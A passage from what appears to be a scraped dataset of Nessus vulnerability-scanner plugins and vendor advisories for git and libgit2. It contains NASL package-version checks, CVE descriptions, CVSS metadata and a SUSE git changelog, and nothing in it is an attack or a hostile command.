(CVE-2018-15501)\n\n - Integer overflow in the index.c:read_entry() function while decompressing a compressed prefix length in\n libgit2 before v0.26.2 allows an attacker to cause a denial of service (out-of-bounds read) via a crafted\n repository index file. (CVE-2018-8098)\n\n - Incorrect returning of an error code in the index.c:read_entry() function leads to a double free in\n libgit2 before v0.26.2, which allows an attacker to cause a denial of service via a crafted repository\n index file. (CVE-2018-8099)\n\n - A remote code execution vulnerability exists when Git for Visual Studio improperly sanitizes input, aka\n 'Git for Visual Studio Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1349,\n CVE-2019-1350, CVE-2019-1354, CVE-2019-1387. (CVE-2019-1352)\n\n - An issue was found in Git before v2.24.1, v2.23.1, v2.22.2, v2.21.1, v2.20.2, v2.19.3, v2.18.2, v2.17.3,\n v2.16.6, v2.15.4, and v2.14.6. When running Git in the Windows Subsystem for Linux (also known as WSL)\n while accessing a working directory on a regular Windows drive, none of the NTFS protections were active.\n (CVE-2019-1353)\n\n - An issue was discovered in libgit2 before 0.28.4 and 0.9x before 0.99.0. path.c mishandles equivalent\n filenames that exist because of NTFS Alternate Data Streams. This may allow remote code execution when\n cloning a repository. This issue is similar to CVE-2019-1352. (CVE-2020-12278)\n\n - An issue was discovered in libgit2 before 0.28.4 and 0.9x before 0.99.0. checkout.c mishandles equivalent\n filenames that exist because of NTFS short names. This may allow remote code execution when cloning a\n repository. This issue is similar to CVE-2019-1353. 
(CVE-2020-12279)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=892961\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/source-package/libgit2\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/lts/security/2022/dla-2936\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2018-10887\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2018-10888\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2018-15501\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2018-8098\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2018-8099\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2019-1352\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2019-1353\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2020-12278\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2020-12279\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/stretch/libgit2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the libgit2 packages.\n\nFor Debian 9 stretch, these problems have been fixed in version 0.25.1+really0.24.6-1+deb9u1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n 
script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1352\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-12279\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgit2-24\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgit2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('debian_package.inc');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar release = get_kb_item('Host/Debian/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Debian');\nvar release = chomp(release);\nif (! 
preg(pattern:\"^(9)\\.[0-9]+\", string:release)) audit(AUDIT_OS_NOT, 'Debian 9.0', 'Debian ' + release);\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Debian', cpu);\n\nvar pkgs = [\n {'release': '9.0', 'prefix': 'libgit2-24', 'reference': '0.25.1+really0.24.6-1+deb9u1'},\n {'release': '9.0', 'prefix': 'libgit2-dev', 'reference': '0.25.1+really0.24.6-1+deb9u1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var release = NULL;\n var prefix = NULL;\n var reference = NULL;\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['prefix'])) prefix = package_array['prefix'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (release && prefix && reference) {\n if (deb_check(release:release, prefix:prefix, reference:reference)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : deb_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = deb_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libgit2-24 / libgit2-dev');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-23T02:33:15", "description": "According to the versions of the git packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. 
With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs 'git clone\n --recurse-submodules' because submodule 'names' are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with '../' in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.(CVE-2018-11235)\n\n - A shell command injection flaw related to the handling of 'ssh' URLs has been discovered in Git. An attacker could use this flaw to execute shell commands with the privileges of the user running the Git client, for example, when performing a 'clone' action on a malicious repository or a legitimate repository containing a malicious commit.(CVE-2017-1000117)\n\n - Git before 2.10.5, 2.11.x before 2.11.4, 2.12.x before 2.12.5, 2.13.x before 2.13.6, and 2.14.x before 2.14.2 uses unsafe Perl scripts to support subcommands such as cvsserver, which allows attackers to execute arbitrary OS commands via shell metacharacters in a module name.\n The vulnerable code is reachable via git-shell even without CVS support.(CVE-2017-14867)\n\n - It was found that the git-prompt.sh script shipped with git failed to correctly handle branch names containing special characters. A specially crafted git repository could use this flaw to execute arbitrary commands if a user working with the repository configured their shell to include repository information in the prompt.(CVE-2014-9938)\n\n - An integer truncation flaw and an integer overflow flaw, both leading to a heap-based buffer overflow, were found in the way Git processed certain path information. A remote attacker could create a specially crafted Git repository that would cause a Git client or server to crash or, possibly, execute arbitrary code.(CVE-2016-2324)\n\n - A flaw was found in the way the git-remote-ext helper processed certain URLs. 
If a user had Git configured to automatically clone submodules from untrusted repositories, an attacker could inject commands into the URL of a submodule, allowing them to execute arbitrary code on the user's system.(CVE-2015-7545)\n\n - Git before 2.14.5, 2.15.x before 2.15.3, 2.16.x before 2.16.5, 2.17.x before 2.17.2, 2.18.x before 2.18.1, and 2.19.x before 2.19.1 allows remote code execution during processing of a recursive 'git clone' of a superproject if a .gitmodules file has a URL field beginning with a '-' character.(CVE-2018-17456)\n\n - An integer truncation flaw and an integer overflow flaw, both leading to a heap-based buffer overflow, were found in the way Git processed certain path information. A remote attacker could create a specially crafted Git repository that would cause a Git client or server to crash or, possibly, execute arbitrary code.(CVE-2016-2315)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-05-14T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 3.0.1.0 : git (EulerOS-SA-2019-1420)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9938", "CVE-2015-7545", "CVE-2016-2315", "CVE-2016-2324", "CVE-2017-1000117", "CVE-2017-14867", "CVE-2018-11235", "CVE-2018-17456"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:git", "p-cpe:/a:huawei:euleros:perl-Git", "cpe:/o:huawei:euleros:uvp:3.0.1.0"], "id": "EULEROS_SA-2019-1420.NASL", "href": "https://www.tenable.com/plugins/nessus/124923", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124923);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2014-9938\",\n \"CVE-2015-7545\",\n \"CVE-2016-2315\",\n \"CVE-2016-2324\",\n \"CVE-2017-1000117\",\n \"CVE-2017-14867\",\n \"CVE-2018-11235\",\n \"CVE-2018-17456\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : git (EulerOS-SA-2019-1420)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the git packages installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x\n before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before\n 2.17.1, remote code execution can occur. 
With a crafted\n .gitmodules file, a malicious project can execute an\n arbitrary script on a machine that runs 'git clone\n --recurse-submodules' because submodule 'names' are\n obtained from this file, and then appended to\n $GIT_DIR/modules, leading to directory traversal with\n '../' in a name. Finally, post-checkout hooks from a\n submodule are executed, bypassing the intended design\n in which hooks are not obtained from a remote\n server.(CVE-2018-11235)\n\n - A shell command injection flaw related to the handling\n of 'ssh' URLs has been discovered in Git. An attacker\n could use this flaw to execute shell commands with the\n privileges of the user running the Git client, for\n example, when performing a 'clone' action on a\n malicious repository or a legitimate repository\n containing a malicious commit.(CVE-2017-1000117)\n\n - Git before 2.10.5, 2.11.x before 2.11.4, 2.12.x before\n 2.12.5, 2.13.x before 2.13.6, and 2.14.x before 2.14.2\n uses unsafe Perl scripts to support subcommands such as\n cvsserver, which allows attackers to execute arbitrary\n OS commands via shell metacharacters in a module name.\n The vulnerable code is reachable via git-shell even\n without CVS support.(CVE-2017-14867)\n\n - It was found that the git-prompt.sh script shipped with\n git failed to correctly handle branch names containing\n special characters. A specially crafted git repository\n could use this flaw to execute arbitrary commands if a\n user working with the repository configured their shell\n to include repository information in the\n prompt.(CVE-2014-9938)\n\n - An integer truncation flaw and an integer overflow\n flaw, both leading to a heap-based buffer overflow,\n were found in the way Git processed certain path\n information. 
A remote attacker could create a specially\n crafted Git repository that would cause a Git client or\n server to crash or, possibly, execute arbitrary\n code.(CVE-2016-2324)\n\n - A flaw was found in the way the git-remote-ext helper\n processed certain URLs. If a user had Git configured to\n automatically clone submodules from untrusted\n repositories, an attacker could inject commands into\n the URL of a submodule, allowing them to execute\n arbitrary code on the user's system.(CVE-2015-7545)\n\n - Git before 2.14.5, 2.15.x before 2.15.3, 2.16.x before\n 2.16.5, 2.17.x before 2.17.2, 2.18.x before 2.18.1, and\n 2.19.x before 2.19.1 allows remote code execution\n during processing of a recursive 'git clone' of a\n superproject if a .gitmodules file has a URL field\n beginning with a '-' character.(CVE-2018-17456)\n\n - An integer truncation flaw and an integer overflow\n flaw, both leading to a heap-based buffer overflow,\n were found in the way Git processed certain path\n information. A remote attacker could create a specially\n crafted Git repository that would cause a Git client or\n server to crash or, possibly, execute arbitrary\n code.(CVE-2016-2315)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1420\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8375b968\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected git packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"git-1.8.3.1-20.h1\",\n \"perl-Git-1.8.3.1-20.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-15T13:46:17", "description": "This update for git fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2020-11008: Specially crafted URLs may have tricked the credentials helper to providing credential information that is not appropriate for the protocol in use and host being contacted (bsc#1169936)\n\ngit was updated to 2.26.1 (bsc#1169786, jsc#ECO-1628, bsc#1149792)\n\nFix 
git-daemon not starting after conversion from sysvinit to systemd service (bsc#1169605).\n\nCVE-2020-5260: Specially crafted URLs with newline characters could have been used to make the Git client to send credential information for a wrong host to the attacker's site bsc#1168930\n\ngit 2.26.0 (bsc#1167890, jsc#SLE-11608) :\n\n'git rebase' now uses a different backend that is based on the 'merge' machinery by default. The 'rebase.backend' configuration variable reverts to old behaviour when set to 'apply'\n\nImproved handling of sparse checkouts\n\nImprovements to many commands and internal features\n\ngit 2.25.2 :\n\nbug fixes to various subcommands in specific operations\n\ngit 2.25.1 :\n\n'git commit' now honors advise.statusHints\n\nvarious updates, bug fixes and documentation updates\n\ngit 2.25.0\n\nThe branch description ('git branch --edit-description') has been used to fill the body of the cover letters by the format-patch command;\nthis has been enhanced so that the subject can also be filled.\n\nA few commands learned to take the pathspec from the standard input or a named file, instead of taking it as the command line arguments, with the '--pathspec-from-file' option.\n\nTest updates to prepare for SHA-2 transition continues.\n\nRedo 'git name-rev' to avoid recursive calls.\n\nWhen all files from some subdirectory were renamed to the root directory, the directory rename heuristics would fail to detect that as a rename/merge of the subdirectory to the root directory, which has been corrected.\n\nHTTP transport had possible allocator/deallocator mismatch, which has been corrected.\n\ngit 2.24.1 :\n\nCVE-2019-1348: The --export-marks option of fast-import is exposed also via the in-stream command feature export-marks=... 
and it allows overwriting arbitrary paths (bsc#1158785)\n\nCVE-2019-1349: on Windows, when submodules are cloned recursively, under certain circumstances Git could be fooled into using the same Git directory twice (bsc#1158787)\n\nCVE-2019-1350: Incorrect quoting of command-line arguments allowed remote code execution during a recursive clone in conjunction with SSH URLs (bsc#1158788)\n\nCVE-2019-1351: on Windows mistakes drive letters outside of the US-English alphabet as relative paths (bsc#1158789)\n\nCVE-2019-1352: on Windows was unaware of NTFS Alternate Data Streams (bsc#1158790)\n\nCVE-2019-1353: when run in the Windows Subsystem for Linux while accessing a working directory on a regular Windows drive, none of the NTFS protections were active (bsc#1158791)\n\nCVE-2019-1354: on Windows refuses to write tracked files with filenames that contain backslashes (bsc#1158792)\n\nCVE-2019-1387: Recursive clones vulnerability that is caused by too-lax validation of submodule names, allowing very targeted attacks via remote code execution in recursive clones (bsc#1158793)\n\nCVE-2019-19604: a recursive clone followed by a submodule update could execute code contained within the repository without the user explicitly having asked for that (bsc#1158795)\n\ngit 2.24.0\n\nThe command line parser learned '--end-of-options' notation.\n\nA mechanism to affect the default setting for a (related) group of configuration variables is introduced.\n\n'git fetch' learned '--set-upstream' option to help those who first clone from their private fork they intend to push to, add the true upstream via 'git remote add' and then 'git fetch' from it.\n\nfixes and improvements to UI, workflow and features, bash completion fixes\n\ngit 2.23.0 :\n\nThe '--base' option of 'format-patch' computed the patch-ids for prerequisite patches in an unstable way, which has been updated to compute in a way that is compatible with 'git patch-id\n\n--stable'.\n\nThe 'git log' command by default behaves as 
if the --mailmap option was given.\n\nfixes and improvements to UI, workflow and features\n\ngit 2.22.1\n\nA relative pathname given to 'git init --template=<path> <repo>' ought to be relative to the directory 'git init' gets invoked in, but it instead was made relative to the repository, which has been corrected.\n\n'git worktree add' used to fail when another worktree connected to the same repository was corrupt, which has been corrected.\n\n'git am -i --resolved' segfaulted after trying to see a commit as if it were a tree, which has been corrected.\n\n'git merge --squash' is designed to update the working tree and the index without creating the commit, and this cannot be countermanded by adding the '--commit' option; the command now refuses to work when both options are given.\n\nUpdate to Unicode 12.1 width table.\n\n'git request-pull' learned to warn when the ref we ask them to pull from in the local repository and in the published repository are different.\n\n'git fetch' into a lazy clone forgot to fetch base objects that are necessary to complete delta in a thin packfile, which has been corrected.\n\nThe URL decoding code has been updated to avoid going past the end of the string while parsing %-<hex>-<hex> sequence.\n\n'git clean' silently skipped a path when it cannot lstat() it; now it gives a warning.\n\n'git rm' to resolve a conflicted path leaked an internal message 'needs merge' before actually removing the path, which was confusing.\nThis has been corrected.\n\nMany more bugfixes and code cleanups.\n\nremoval of SuSEfirewall2 service, since SuSEfirewall2 has been replaced by firewalld.\n\npartial fix for git instaweb giving 500 error (bsc#1112230)\n\ngit 2.22.0\n\nThe filter specification '--filter=sparse:path=<path>' used to create a lazy/partial clone has been removed.
Using a blob that is part of the project as sparse specification is still supported with the '--filter=sparse:oid=<blob>' option\n\n'git checkout --no-overlay' can be used to trigger a new mode of checking out paths out of the tree-ish, that allows paths that match the pathspec that are in the current index and working tree and are not in the tree-ish.\n\nFour new configuration variables {author,committer}.{name,email} have been introduced to override user.{name,email} in more specific cases.\n\n'git branch' learned a new subcommand '--show-current'.\n\nThe command line completion (in contrib/) has been taught to complete more subcommand parameters.\n\nThe completion helper code now pays attention to repository-local configuration (when available), which allows --list-cmds to honour a repository specific setting of completion.commands, for example.\n\nThe list of conflicted paths shown in the editor while concluding a conflicted merge was shown above the scissors line when the clean-up mode is set to 'scissors', even though it was commented out just like the list of updated paths and other information to help the user explain the merge better.\n\n'git rebase' that was reimplemented in C did not set ORIG_HEAD correctly, which has been corrected.\n\n'git worktree add' used to do a 'find an available name with stat and then mkdir', which is race-prone. This has been fixed by using mkdir and reacting to EEXIST in a loop.\n\nMove to DocBook 5.x. Asciidoctor 2.x no longer supports the legacy DocBook 4.5 format.\n\nupdate git-web AppArmor profile for bash and tar usrMerge (bsc#1132350)\n\ngit 2.21.0\n\nHistorically, the '-m' (mainline) option can only be used for 'git cherry-pick' and 'git revert' when working with a merge commit. This version of Git no longer warns or errors out when working with a single-parent commit, as long as the argument to the '-m' option is 1 (i.e.
it has only one parent, and the request is to pick or revert relative to that first parent). Scripts that relied on the behaviour may get broken with this change.\n\nSmall fixes and features for fast-export and fast-import.\n\nThe 'http.version' configuration variable can be used with recent enough versions of cURL library to force the version of HTTP used to talk when fetching and pushing.\n\n'git push $there $src:$dst' rejects when $dst is not a fully qualified refname and it is not clear what the end user meant.\n\nUpdate 'git multimail' from the upstream.\n\nA new date format '--date=human' that morphs its output depending on how far the time is from the current time has been introduced.\n'--date=auto:human' can be used to use this new format (or any existing format) when the output is going to the pager or to the terminal, and otherwise the default format.\n\nFix worktree creation race (bsc#1114225).\n\nadd shadow build dependency to the -daemon subpackage.\n\ngit 2.20.1 :\n\nportability fixes\n\n'git help -a' did not work well when an overly long alias was defined\n\nno longer squelched an error message when the run_command API failed to run a missing command\n\ngit 2.20.0\n\n'git help -a' now gives verbose output (same as 'git help -av'). Those who want the old output may say 'git help --no-verbose -a'..\n\n'git send-email' learned to grab address-looking string on any trailer whose name ends with '-by'.\n\n'git format-patch' learned new '--interdiff' and '--range-diff' options to explain the difference between this version and the previous attempt in the cover letter (or after the three-dashes as a comment).\n\nDeveloper builds now use -Wunused-function compilation option.\n\nFix a bug in which the same path could be registered under multiple worktree entries if the path was missing (for instance, was removed manually). 
Also, as a convenience, expand the number of cases in which\n\n--force is applicable.\n\nThe overly large Documentation/config.txt file have been split into million little pieces. This potentially allows each individual piece to be included into the manual page of the command it affects more easily.\n\nMalformed or crafted data in packstream can make our code attempt to read or write past the allocated buffer and abort, instead of reporting an error, which has been fixed.\n\nFix for a long-standing bug that leaves the index file corrupt when it shrinks during a partial commit.\n\n'git merge' and 'git pull' that merges into an unborn branch used to completely ignore '--verify-signatures', which has been corrected.\n\n...and much more features and fixes\n\ngit 2.19.2 :\n\nvarious bug fixes for multiple subcommands and operations\n\ngit 2.19.1 :\n\nCVE-2018-17456: Specially crafted .gitmodules files may have allowed arbitrary code execution when the repository is cloned with\n\n--recurse-submodules (bsc#1110949)\n\ngit 2.19.0 :\n\n'git diff' compares the index and the working tree. For paths added with intent-to-add bit, the command shows the full contents of them as added, but the paths themselves were not marked as new files. They are now shown as new by default.\n\n'git apply' learned the '--intent-to-add' option so that an otherwise working-tree-only application of a patch will add new paths to the index marked with the 'intent-to-add' bit.\n\n'git grep' learned the '--column' option that gives not just the line number but the column number of the hit.\n\nThe '-l' option in 'git branch -l' is an unfortunate short-hand for '--create-reflog', but many users, both old and new, somehow expect it to be something else, perhaps '--list'. 
This step warns when '-l' is used as a short-hand for '--create-reflog' and warns about the future repurposing of the it when it is used.\n\nThe userdiff pattern for .php has been updated.\n\nThe content-transfer-encoding of the message 'git send-email' sends out by default was 8bit, which can cause trouble when there is an overlong line to bust RFC 5322/2822 limit. A new option 'auto' to automatically switch to quoted-printable when there is such a line in the payload has been introduced and is made the default.\n\n'git checkout' and 'git worktree add' learned to honor checkout.defaultRemote when auto-vivifying a local branch out of a remote tracking branch in a repository with multiple remotes that have tracking branches that share the same names. (merge 8d7b558bae ab/checkout-default-remote later to maint).\n\n'git grep' learned the '--only-matching' option.\n\n'git rebase --rebase-merges' mode now handles octopus merges as well.\n\nAdd a server-side knob to skip commits in exponential/fibbonacci stride in an attempt to cover wider swath of history with a smaller number of iterations, potentially accepting a larger packfile transfer, instead of going back one commit a time during common ancestor discovery during the 'git fetch' transaction. (merge 42cc7485a2 jt/fetch-negotiator-skipping later to maint).\n\nA new configuration variable core.usereplacerefs has been added, primarily to help server installations that want to ignore the replace mechanism altogether.\n\nTeach 'git tag -s' etc. a few configuration variables (gpg.format that can be set to 'openpgp' or 'x509', and gpg.<format>.program that is used to specify what program to use to deal with the format) to allow x.509 certs with CMS via 'gpgsm' to be used instead of openpgp via 'gnupg'. 
\n\nMany more strings are prepared for l10n.\n\n'git p4 submit' learns to ask its own pre-submit hook if it should continue with submitting.\n\nThe test performed at the receiving end of 'git push' to prevent bad objects from entering repository can be customized via receive.fsck.* configuration variables; we now have gained a counterpart to do the same on the 'git fetch' side, with fetch.fsck.* configuration variables.\n\n'git pull --rebase=interactive' learned 'i' as a short-hand for 'interactive'.\n\n'git instaweb' has been adjusted to run better with newer Apache on RedHat based distros.\n\n'git range-diff' is a reimplementation of 'git tbdiff' that lets us compare individual patches in two iterations of a topic.\n\nThe sideband code learned to optionally paint selected keywords at the beginning of incoming lines on the receiving end.\n\n'git branch --list' learned to take the default sort order from the 'branch.sort' configuration variable, just like 'git tag --list' pays attention to 'tag.sort'.\n\n'git worktree' command learned '--quiet' option to make it less verbose.\n\ngit 2.18.0 :\n\nimprovements to rename detection logic\n\nWhen built with more recent cURL, GIT_SSL_VERSION can now specify 'tlsv1.3' as its value.\n\n'git mergetools' learned talking to guiffy.\n\nvarious other workflow improvements and fixes\n\nperformance improvements and other developer visible fixes\n\ngit 2.17.1\n\nSubmodule 'names' come from the untrusted .gitmodules file, but we blindly append them to $GIT_DIR/modules to create our on-disk repo paths. This means you can do bad things by putting '../' into the name.
We now enforce some rules for submodule names which will cause Git to ignore these malicious names (CVE-2018-11235, bsc#1095219)\n\nIt was possible to trick the code that sanity-checks paths on NTFS into reading random piece of memory (CVE-2018-11233, bsc#1095218)\n\nSupport on the server side to reject pushes to repositories that attempt to create such problematic .gitmodules file etc. as tracked contents, to help hosting sites protect their customers by preventing malicious contents from spreading.\n\ngit 2.17.0 :\n\n'diff' family of commands learned '--find-object=<object-id>' option to limit the findings to changes that involve the named object.\n\n'git format-patch' learned to give 72-cols to diffstat, which is consistent with other line length limits the subcommand uses for its output meant for e-mails.\n\nThe log from 'git daemon' can be redirected with a new option; one relevant use case is to send the log to standard error (instead of syslog) when running it from inetd.\n\n'git rebase' learned to take '--allow-empty-message' option.\n\n'git am' has learned the '--quit' option, in addition to the existing '--abort' option; having the pair mirrors a few other commands like 'rebase' and 'cherry-pick'.\n\n'git worktree add' learned to run the post-checkout hook, just like 'git clone' runs it upon the initial checkout.\n\n'git tag' learned an explicit '--edit' option that allows the message given via '-m' and '-F' to be further edited.\n\n'git fetch --prune-tags' may be used as a handy short-hand for getting rid of stale tags that are locally held.\n\nThe new '--show-current-patch' option gives an end-user facing way to get the diff being applied when 'git rebase' (and 'git am') stops with a conflict.\n\n'git add -p' used to offer '/' (look for a matching hunk) as a choice, even there was only one hunk, which has been corrected. Also the single-key help is now given only for keys that are enabled (e.g.
